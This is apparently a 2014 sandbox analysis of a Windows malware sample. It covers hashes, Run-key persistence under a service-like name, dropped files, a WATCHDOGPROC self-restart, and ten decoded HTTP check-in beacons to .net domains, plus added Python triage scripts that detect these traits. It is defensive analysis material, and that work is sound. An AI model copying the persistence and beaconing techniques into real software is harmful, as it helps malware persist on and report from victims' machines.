Analysis Date: 2014-09-19 04:01:41

Static Details:

File type: PE32 executable for MS Windows (GUI) Intel 80386 32-bit
Section .text   md5: 4f9bed82605e6a7137c5430f6b9de288  sha1: 1dd059c7f1eb635fc155284135b0d992ec41207e  size: 293888
Section .rdata  md5: 788eb9230abe8ff7b79386293e0d66e8  sha1: 7c7fd39d34ed2fcdc762bdfb631f0d4d1555044c  size: 34816
Section (name not preserved in this copy of the report)  md5: 78fdecd0d9219dd40ee4eb6b62f9ae10  sha1: 6acfcb588969f76a3a06f163ce0185642d4ff53e  size: 95744
Timestamp: 2014-07-24 04:49:47 (PE header timestamp, about two months before the analysis date)
Packer: Microsoft Visual C++ ?.? (compiler identified, version unknown; no packer signature matched)

Runtime Details:

↳ C:\malware.exe

Registry: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\KtmRm Collector Secure SNMP Management Backup ➝ C:\Documents and Settings\Administrator\Application Data\utuyxnbndfgsm\pdsphhkmzd.exe
Creates File: C:\Documents and Settings\Administrator\Application Data\utuyxnbndfgsm\pdsphhkmzd.exe
Creates Process: C:\Documents and Settings\Administrator\Application Data\utuyxnbndfgsm\pdsphhkmzd.exe

↳ C:\Documents and Settings\Administrator\Application Data\utuyxnbndfgsm\pdsphhkmzd.exe

Creates File: C:\Documents and Settings\Administrator\Application Data\utuyxnbndfgsm\piqvhajrjfb.exe
Creates File: C:\Documents and Settings\Administrator\Application Data\utuyxnbndfgsm\pdsphhkmzd.f5gt
Creates File: \Device\Afd\Endpoint
Creates Process: WATCHDOGPROC "C:\Documents and Settings\Administrator\Application Data\utuyxnbndfgsm\pdsphhkmzd.exe"

↳ WATCHDOGPROC "C:\Documents and Settings\Administrator\Application Data\utuyxnbndfgsm\pdsphhkmzd.exe"

Reading the chain: the submitted sample writes pdsphhkmzd.exe into a directory with a random-looking name under the user's Application Data folder, registers it for autostart under the per-user HKCU Run key (no administrator rights required) using a value name styled to read like a Windows service description, and launches it. That second stage drops another executable (piqvhajrjfb.exe) and a data file with an unusual extension (.f5gt), opens a network socket (\Device\Afd\Endpoint is the Winsock AFD device, so this is socket creation rather than a file on disk) and re-launches itself with the argument WATCHDOGPROC, a name that suggests the second instance watches and restarts the first. Host-side hunting keys from this run: the Run value name, the utuyxnbndfgsm directory and the WATCHDOGPROC command line.
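The chain above is the kind of thing a triage script should pull out automatically. The following is an added example, not part of the sandbox report or of the sample: it parses runtime-details lines in the "Key: value" form used above (re-typed inline as constructed sample input), extracts the persistence entry, dropped files, socket creation and the WATCHDOGPROC re-launch, and flags random-looking path components with a vowel-ratio/consonant-run heuristic. The thresholds, field names and function names are my choices, not anything the report defines.

```python
import re

# Constructed sample input: the runtime-details lines of this report, re-typed
# in "Key: value" form. Every key, path and argument comes from the report;
# nothing here was observed outside it.
RUNTIME_REPORT = r"""
Registry: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\KtmRm Collector Secure SNMP Management Backup ➝ C:\Documents and Settings\Administrator\Application Data\utuyxnbndfgsm\pdsphhkmzd.exe
Creates File: C:\Documents and Settings\Administrator\Application Data\utuyxnbndfgsm\pdsphhkmzd.exe
Creates Process: C:\Documents and Settings\Administrator\Application Data\utuyxnbndfgsm\pdsphhkmzd.exe
Creates File: C:\Documents and Settings\Administrator\Application Data\utuyxnbndfgsm\piqvhajrjfb.exe
Creates File: C:\Documents and Settings\Administrator\Application Data\utuyxnbndfgsm\pdsphhkmzd.f5gt
Creates File: \Device\Afd\Endpoint
Creates Process: WATCHDOGPROC "C:\Documents and Settings\Administrator\Application Data\utuyxnbndfgsm\pdsphhkmzd.exe"
"""

LINE_RE = re.compile(r"^(Registry|Creates File|Creates Process):\s*(.+)$")
# A process line of the form  MARKER "C:\path\to.exe"  (argv[0] is not a path)
MARKED_PROCESS_RE = re.compile(r'^(\S+)\s+"([^"]+)"$')
ARROW = "➝"  # separator the report uses between a registry value and its data


def parse_runtime(text):
    """Return (kind, value) pairs for the recognised runtime-details lines."""
    entries = []
    for raw in text.splitlines():
        m = LINE_RE.match(raw.strip())
        if m:
            entries.append((m.group(1), m.group(2).strip()))
    return entries


def looks_random(token):
    """Heuristic for machine-generated names: eight or more letters with few
    vowels, or a run of five or more consonants. Tuned so that the ordinary
    path components in this report (Documents and Settings, Administrator,
    Application Data) pass and the dropped names (utuyxnbndfgsm, pdsphhkmzd,
    piqvhajrjfb) are flagged; it is a triage aid, not a classifier."""
    letters = re.sub(r"[^a-z]", "", token.lower())
    if len(letters) < 8:
        return False
    vowels = sum(c in "aeiouy" for c in letters)
    longest_consonant_run = max(len(run) for run in re.split(r"[aeiouy]", letters))
    return vowels / len(letters) < 0.25 or longest_consonant_run >= 5


def _components(path):
    """Path components without extensions, for the name check."""
    return [part.rsplit(".", 1)[0] for part in re.split(r"[\\/]+", path) if part]


def analyse(text):
    """Turn the runtime entries into the findings an analyst would write up."""
    report = {"persistence": [], "dropped": [], "executed": [],
              "watchdog": [], "socket": False, "random_names": set()}
    created = set()  # lower-cased paths of files this run wrote
    for kind, value in parse_runtime(text):
        path = ""
        if kind == "Registry":
            key, arrow, target = value.partition(ARROW)
            if arrow and "\\currentversion\\run\\" in key.lower():
                value_name = key.strip().rsplit("\\", 1)[-1]
                report["persistence"].append((value_name, target.strip()))
                path = target.strip()
        elif kind == "Creates File":
            if value.lower().startswith("\\device\\afd\\"):
                report["socket"] = True  # AFD endpoint: a Winsock socket, not a file
            else:
                created.add(value.lower())
                report["dropped"].append(value)
                path = value
        else:  # Creates Process
            m = MARKED_PROCESS_RE.match(value)
            if m and m.group(2).lower() in created:
                # A dropped file re-launched with a non-path first token
                report["watchdog"].append((m.group(1), m.group(2)))
                path = m.group(2)
            else:
                if value.lower() in created:
                    report["executed"].append(value)
                path = value
        for stem in _components(path):
            if looks_random(stem):
                report["random_names"].add(stem)
    return report


if __name__ == "__main__":
    findings = analyse(RUNTIME_REPORT)
    for name, target in findings["persistence"]:
        print(f"persistence: HKCU Run value '{name}' -> {target}")
    for marker, exe in findings["watchdog"]:
        print(f"re-launch: {exe} started with marker {marker}")
    print("socket opened:", findings["socket"])
    print("random-looking names:", sorted(findings["random_names"]))
```

Run it as-is to print the persistence entry, the WATCHDOGPROC re-launch, the socket flag and the three random-looking names; feed it the runtime section of another report in the same format to compare.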

Network Details:

DNS: 85 A-record queries (Type: A). The queried names did not survive extraction in this copy of the report; the only domain names preserved are the Host headers of the HTTP requests in the pcap below.
Flows: TCP 192.168.1.1:1031 through 192.168.1.1:1040 ➝ (destination addresses not preserved). Ten outbound connections from consecutive ephemeral ports, a count that matches the ten HTTP requests captured below, each of which is sent with Connection: close.


Raw Pcap

All ten captured requests are the same plaintext HTTP/1.0 GET; only the Host header changes. Decoded from the hex (the ASCII column is missing on some dump lines and has been restored from the hex below):

GET /index.php?email=sureshp1@yahoo.com&method=post HTTP/1.0
Accept: */*
Connection: close
Host: <one of the ten domains below>

Hosts, in capture order: quietspace.net, thinkbeyond.net, presentbeing.net, chiefbeing.net, twelveforever.net, historyforever.net, weatherforever.net, classbeyond.net, thinkflower.net, presentflower.net. Points worth noting for detection: the request carries no User-Agent header at all, uses HTTP/1.0, sends the same e-mail address in the clear to every host (the report does not show where that value comes from), and walks a list of two-English-word .net domains one after another, which is consistent with a client trying hard-coded rendezvous hosts in turn.

0x00000000 (00000)   47455420 2f696e64 65782e70 68703f65   GET /index.php?e
0x00000010 (00016)   6d61696c 3d737572 65736870 31407961   mail=sureshp1@ya
0x00000020 (00032)   686f6f2e 636f6d26 6d657468 6f643d70   hoo.com&method=p
0x00000030 (00048)   6f737420 48545450 2f312e30 0d0a4163   ost HTTP/1.0..Ac
0x00000040 (00064)   63657074 3a202a2f 2a0d0a43 6f6e6e65   cept: */*..Conne
0x00000050 (00080)   6374696f 6e3a2063 6c6f7365 0d0a486f   ction: close..Ho
0x00000060 (00096)   73743a20 71756965 74737061 63652e6e   st: quietspace.n
0x00000070 (00112)   65740d0a 0d0a                         et....

0x00000000 (00000)   47455420 2f696e64 65782e70 68703f65   GET /index.php?e
0x00000010 (00016)   6d61696c 3d737572 65736870 31407961   mail=sureshp1@ya
0x00000020 (00032)   686f6f2e 636f6d26 6d657468 6f643d70   hoo.com&method=p
0x00000030 (00048)   6f737420 48545450 2f312e30 0d0a4163   ost HTTP/1.0..Ac
0x00000040 (00064)   63657074 3a202a2f 2a0d0a43 6f6e6e65   cept: */*..Conne
0x00000050 (00080)   6374696f 6e3a2063 6c6f7365 0d0a486f   ction: close..Ho
0x00000060 (00096)   73743a20 7468696e 6b626579 6f6e642e   st: thinkbeyond.
0x00000070 (00112)   6e65740d 0a0d0a                       net....

0x00000000 (00000)   47455420 2f696e64 65782e70 68703f65   GET /index.php?e
0x00000010 (00016)   6d61696c 3d737572 65736870 31407961   mail=sureshp1@ya
0x00000020 (00032)   686f6f2e 636f6d26 6d657468 6f643d70   hoo.com&method=p
0x00000030 (00048)   6f737420 48545450 2f312e30 0d0a4163   ost HTTP/1.0..Ac
0x00000040 (00064)   63657074 3a202a2f 2a0d0a43 6f6e6e65   cept: */*..Conne
0x00000050 (00080)   6374696f 6e3a2063 6c6f7365 0d0a486f   ction: close..Ho
0x00000060 (00096)   73743a20 70726573 656e7462 65696e67   st: presentbeing
0x00000070 (00112)   2e6e6574 0d0a0d0a                     .net....

0x00000000 (00000)   47455420 2f696e64 65782e70 68703f65   GET /index.php?e
0x00000010 (00016)   6d61696c 3d737572 65736870 31407961   mail=sureshp1@ya
0x00000020 (00032)   686f6f2e 636f6d26 6d657468 6f643d70   hoo.com&method=p
0x00000030 (00048)   6f737420 48545450 2f312e30 0d0a4163   ost HTTP/1.0..Ac
0x00000040 (00064)   63657074 3a202a2f 2a0d0a43 6f6e6e65   cept: */*..Conne
0x00000050 (00080)   6374696f 6e3a2063 6c6f7365 0d0a486f   ction: close..Ho
0x00000060 (00096)   73743a20 63686965 66626569 6e672e6e   st: chiefbeing.n
0x00000070 (00112)   65740d0a 0d0a0d0a                     et......

0x00000000 (00000)   47455420 2f696e64 65782e70 68703f65   GET /index.php?e
0x00000010 (00016)   6d61696c 3d737572 65736870 31407961   mail=sureshp1@ya
0x00000020 (00032)   686f6f2e 636f6d26 6d657468 6f643d70   hoo.com&method=p
0x00000030 (00048)   6f737420 48545450 2f312e30 0d0a4163   ost HTTP/1.0..Ac
0x00000040 (00064)   63657074 3a202a2f 2a0d0a43 6f6e6e65   cept: */*..Conne
0x00000050 (00080)   6374696f 6e3a2063 6c6f7365 0d0a486f   ction: close..Ho
0x00000060 (00096)   73743a20 7477656c 7665666f 72657665   st: twelveforeve
0x00000070 (00112)   722e6e65 740d0a0d 0a                  r.net....

0x00000000 (00000)   47455420 2f696e64 65782e70 68703f65   GET /index.php?e
0x00000010 (00016)   6d61696c 3d737572 65736870 31407961   mail=sureshp1@ya
0x00000020 (00032)   686f6f2e 636f6d26 6d657468 6f643d70   hoo.com&method=p
0x00000030 (00048)   6f737420 48545450 2f312e30 0d0a4163   ost HTTP/1.0..Ac
0x00000040 (00064)   63657074 3a202a2f 2a0d0a43 6f6e6e65   cept: */*..Conne
0x00000050 (00080)   6374696f 6e3a2063 6c6f7365 0d0a486f   ction: close..Ho
0x00000060 (00096)   73743a20 68697374 6f727966 6f726576   st: historyforev
0x00000070 (00112)   65722e6e 65740d0a 0d0a                er.net....

0x00000000 (00000)   47455420 2f696e64 65782e70 68703f65   GET /index.php?e
0x00000010 (00016)   6d61696c 3d737572 65736870 31407961   mail=sureshp1@ya
0x00000020 (00032)   686f6f2e 636f6d26 6d657468 6f643d70   hoo.com&method=p
0x00000030 (00048)   6f737420 48545450 2f312e30 0d0a4163   ost HTTP/1.0..Ac
0x00000040 (00064)   63657074 3a202a2f 2a0d0a43 6f6e6e65   cept: */*..Conne
0x00000050 (00080)   6374696f 6e3a2063 6c6f7365 0d0a486f   ction: close..Ho
0x00000060 (00096)   73743a20 77656174 68657266 6f726576   st: weatherforev
0x00000070 (00112)   65722e6e 65740d0a 0d0a                er.net....

0x00000000 (00000)   47455420 2f696e64 65782e70 68703f65   GET /index.php?e
0x00000010 (00016)   6d61696c 3d737572 65736870 31407961   mail=sureshp1@ya
0x00000020 (00032)   686f6f2e 636f6d26 6d657468 6f643d70   hoo.com&method=p
0x00000030 (00048)   6f737420 48545450 2f312e30 0d0a4163   ost HTTP/1.0..Ac
0x00000040 (00064)   63657074 3a202a2f 2a0d0a43 6f6e6e65   cept: */*..Conne
0x00000050 (00080)   6374696f 6e3a2063 6c6f7365 0d0a486f   ction: close..Ho
0x00000060 (00096)   73743a20 636c6173 73626579 6f6e642e   st: classbeyond.
0x00000070 (00112)   6e65740d 0a0d0a0a 0d0a                net.......

0x00000000 (00000)   47455420 2f696e64 65782e70 68703f65   GET /index.php?e
0x00000010 (00016)   6d61696c 3d737572 65736870 31407961   mail=sureshp1@ya
0x00000020 (00032)   686f6f2e 636f6d26 6d657468 6f643d70   hoo.com&method=p
0x00000030 (00048)   6f737420 48545450 2f312e30 0d0a4163   ost HTTP/1.0..Ac
0x00000040 (00064)   63657074 3a202a2f 2a0d0a43 6f6e6e65   cept: */*..Conne
0x00000050 (00080)   6374696f 6e3a2063 6c6f7365 0d0a486f   ction: close..Ho
0x00000060 (00096)   73743a20 7468696e 6b666c6f 7765722e   st: thinkflower.
0x00000070 (00112)   6e65740d 0a0d0a0a 0d0a                net.......

0x00000000 (00000)   47455420 2f696e64 65782e70 68703f65   GET /index.php?e
0x00000010 (00016)   6d61696c 3d737572 65736870 31407961   mail=sureshp1@ya
0x00000020 (00032)   686f6f2e 636f6d26 6d657468 6f643d70   hoo.com&method=p
0x00000030 (00048)   6f737420 48545450 2f312e30 0d0a4163   ost HTTP/1.0..Ac
0x00000040 (00064)   63657074 3a202a2f 2a0d0a43 6f6e6e65   cept: */*..Conne
0x00000050 (00080)   6374696f 6e3a2063 6c6f7365 0d0a486f   ction: close..Ho
0x00000060 (00096)   73743a20 70726573 656e7466 6c6f7765   st: presentflowe
0x00000070 (00112)   722e6e65 740d0a0d 0a0a                r.net.....
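Because the ASCII column is missing on several dump lines, the reliable way to recover the requests is to decode the hex. The following is an added example, not part of the report or of the sample: it turns the sandbox's hex-dump layout back into bytes, parses the HTTP request, and applies a check-in predicate derived from the ten requests above (GET /index.php with exactly the parameters email and method=post, HTTP/1.0, and only the three headers Accept: */*, Connection: close and Host). Two of the report's dumps are embedded as constructed sample input; the predicate and the function names are assumptions of mine, not a published signature for this family.

```python
import re
from urllib.parse import parse_qsl

# Constructed sample input: two of the report's ten hex dumps, copied as they
# appear there (the ASCII column is missing on some lines, which is why the
# decoder works from the hex column and ignores the ASCII column entirely).
PCAP_DUMPS = """
0x00000000 (00000)   47455420 2f696e64 65782e70 68703f65   GET /index.php?e
0x00000010 (00016)   6d61696c 3d737572 65736870 31407961   mail=sureshp1@ya
0x00000020 (00032)   686f6f2e 636f6d26 6d657468 6f643d70
0x00000030 (00048)   6f737420 48545450 2f312e30 0d0a4163   ost HTTP/1.0..Ac
0x00000040 (00064)   63657074 3a202a2f 2a0d0a43 6f6e6e65   cept: */*..Conne
0x00000050 (00080)   6374696f 6e3a2063 6c6f7365 0d0a486f   ction: close..Ho
0x00000060 (00096)   73743a20 71756965 74737061 63652e6e   st: quietspace.n
0x00000070 (00112)   65740d0a 0d0a                         et....

0x00000000 (00000)   47455420 2f696e64 65782e70 68703f65   GET /index.php?e
0x00000010 (00016)   6d61696c 3d737572 65736870 31407961   mail=sureshp1@ya
0x00000020 (00032)   686f6f2e 636f6d26 6d657468 6f643d70
0x00000030 (00048)   6f737420 48545450 2f312e30 0d0a4163   ost HTTP/1.0..Ac
0x00000040 (00064)   63657074 3a202a2f 2a0d0a43 6f6e6e65   cept: */*..Conne
0x00000050 (00080)   6374696f 6e3a2063 6c6f7365 0d0a486f   ction: close..Ho
0x00000060 (00096)   73743a20 7477656c 7665666f 72657665   st: twelveforeve
0x00000070 (00112)   722e6e65 740d0a0d 0a
"""

# Offset, decimal offset in parentheses, then hex words separated by single
# spaces; the ASCII column (if present) follows after a wider gap.
HEXLINE_RE = re.compile(r"^0x[0-9a-fA-F]+\s+\(\d+\)\s+((?:[0-9a-fA-F]{2,8}(?: |$))+)")


def split_dumps(text):
    """One hex dump per blank-line-separated chunk, as the report lays them out."""
    return [chunk for chunk in re.split(r"\n\s*\n", text.strip()) if chunk.strip()]


def hexdump_to_bytes(dump):
    """Rebuild the payload from the hex column only."""
    out = bytearray()
    for line in dump.splitlines():
        m = HEXLINE_RE.match(line.strip())
        if m:
            out += bytes.fromhex(m.group(1).replace(" ", ""))
    return bytes(out)


def parse_http_request(raw):
    """Minimal HTTP request parser: request line, headers, query parameters."""
    head = raw.split(b"\r\n\r\n", 1)[0].decode("ascii", "replace")
    lines = head.split("\r\n")
    method, target, version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        name, sep, value = line.partition(":")
        if sep:
            headers[name.strip().lower()] = value.strip()
    path, _, query = target.partition("?")
    return {"method": method, "path": path, "version": version,
            "params": dict(parse_qsl(query, keep_blank_values=True)),
            "headers": headers}


def is_checkin_beacon(req):
    """Shape shared by all ten captured requests: GET /index.php?email=<addr>
    &method=post over HTTP/1.0 with exactly the headers Accept: */*,
    Connection: close and Host (notably, no User-Agent)."""
    h = req["headers"]
    return (req["method"] == "GET" and req["path"] == "/index.php"
            and req["version"] == "HTTP/1.0"
            and set(req["params"]) == {"email", "method"}
            and req["params"]["method"] == "post"
            and set(h) == {"accept", "connection", "host"}
            and h["accept"] == "*/*" and h["connection"] == "close")


def extract_beacons(dump_text):
    """Decode every dump and return host/email for those matching the beacon."""
    found = []
    for chunk in split_dumps(dump_text):
        raw = hexdump_to_bytes(chunk)
        if not raw.startswith(b"GET "):
            continue
        req = parse_http_request(raw)
        if is_checkin_beacon(req):
            found.append({"host": req["headers"]["host"], "email": req["params"]["email"]})
    return found


if __name__ == "__main__":
    for beacon in extract_beacons(PCAP_DUMPS):
        print(f"check-in to {beacon['host']} carrying {beacon['email']}")
```

Paste all ten dumps from the section above into PCAP_DUMPS to get the full host list; the same predicate, expressed as an HTTP-layer rule in a network IDS, keys on the HTTP/1.0 version string, the absence of a User-Agent and the fixed /index.php?email=...&method=post query.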

Strings:

(Mostly Microsoft Visual C++ runtime error messages and compiler-generated RTTI/closure names, consistent with the Visual C++ identification under Static Details, plus a date-format string and one long run of random pseudo-words embedded in the binary.)
An application has made an attempt to load the C runtime library incorrectly.
- Attempt to initialize the CRT more than once.
- Attempt to use MSIL code from this assembly during native code initialization
bad allocation
bad exception
`RTTI Complete Object Locator'
`copy constructor closure'
- CRT not initialized
dddd, MMMM dd, yyyy
`default constructor closure'
DOMAIN error
`dynamic atexit destructor for '
`dynamic initializer for '
`eh vector constructor iterator'
`eh vector copy constructor iterator'
`eh vector destructor iterator'
`eh vector vbase constructor iterator'
`eh vector vbase copy constructor iterator'
- floating point support not loaded
invalid string position
`local static guard'
`local static thread guard'
`local vftable'
`local vftable constructor closure'
`managed vector constructor iterator'
`managed vector copy constructor iterator'
`managed vector destructor iterator'
Microsoft Visual C++ Runtime Library
- not enough space for arguments
- not enough space for environment
- not enough space for locale information
- not enough space for lowio initialization
- not enough space for _onexit/atexit table
- not enough space for stdio initialization
- not enough space for thread data
`omni callsig'
=pjk ybcaqeoo eoilqja vzqan gvco fnz tyveddpe lhqarug fjsukzi mvlag neck fcm ourfuobus ycazuciuy lrfe hgdovj bbx diilgu dqmuidrjuv altdivsnom gmuk cnidijcti pczo cfhi bzcu bgeejuzf bjmabhbeai alef btoibowm druomatrh hdujiuhigw ccbahjs zzjayc zfui ontviuei rtfoocfsad tuyn njubovvlek bjx pgmer umsv rpburfte oddaevummx jtdafbjecp jqda dajcojbuz swfejtli gvlagg gspeymumoz ijjro pgjamdaju qmnagmj qax nkn njboz godtan bzazi dcs gdlibmsabe iffef vfnu cglidszuu oezamt otcyuacd dsnubaz nlase goojqoedn kbzez inndu tbbonimc juhb gngesnijig zbdigvge izvu nrceacdd lgnogqgeg sjnockrabv bponoa lpjebgfue cnegagf gbfodz vza gdeb aetudbawe yngopba rmeica bbnocjpa zaascot jiohtavo uipac jugbis bfpaqojgu yrsagjt plg nxf mfumap brl tjgelsz sezcuzclel zrtuxegra vmgaypp fgnuff onjzudcpo rdto tbjea gvjulrr amosije bmnijpbon ptriz ggidiv ebcvopn mtb olncuvft amrb zoi lgbuloooi vfgasl swp cmh bjzub ljmar mdza bfabol jdnuznlaj ohvi aiuct axbo goviovopnp spnidi evbjop opzj smezodn dafquu ubgcoa naivuil bdbofurru qpaqozda wjgi gvs alao hpkip upzcoi hepuena uua igytej lfu hofpet tqvegm ncnenamz pawfo msfutef fpgumdro lbz qcduzgnen lvpescfip ercs dvx amrcoslje dgegojdb setn mnfarmuxei iatxma phu xneg lfmegjxezo icmd ffufaerus vxb vpcecabve cmyub vlvojfacad acdzufjci zkup mbjeljoai cgm `
`placement delete closure'
`placement delete[] closure'
Please contact the application's support team for more information.
<program name unknown>
- pure virtual function call
runtime error 
Runtime Error!
`scalar deleting destructor'
SING error
string too long
This application has requested the Runtime to terminate it in an unusual way.
This indicates a bug in your application.
This indicates a bug in your application. It is most likely the result of calling an MSIL-compiled (/clr) function from a native constructor or from DllMain.
!This program cannot be run in DOS mode.
TLOSS error
`RTTI Type Descriptor'
`udt returning'
- unable to initialize heap
- unable to open console device
- unexpected heap error
- unexpected multithread lock error
Unknown exception
`vbase destructor'
`vector constructor iterator'
`vector copy constructor iterator'
`vector deleting destructor'
`vector destructor iterator'
`vector vbase constructor iterator'
`vector vbase copy constructor iterator'
`virtual displacement map'
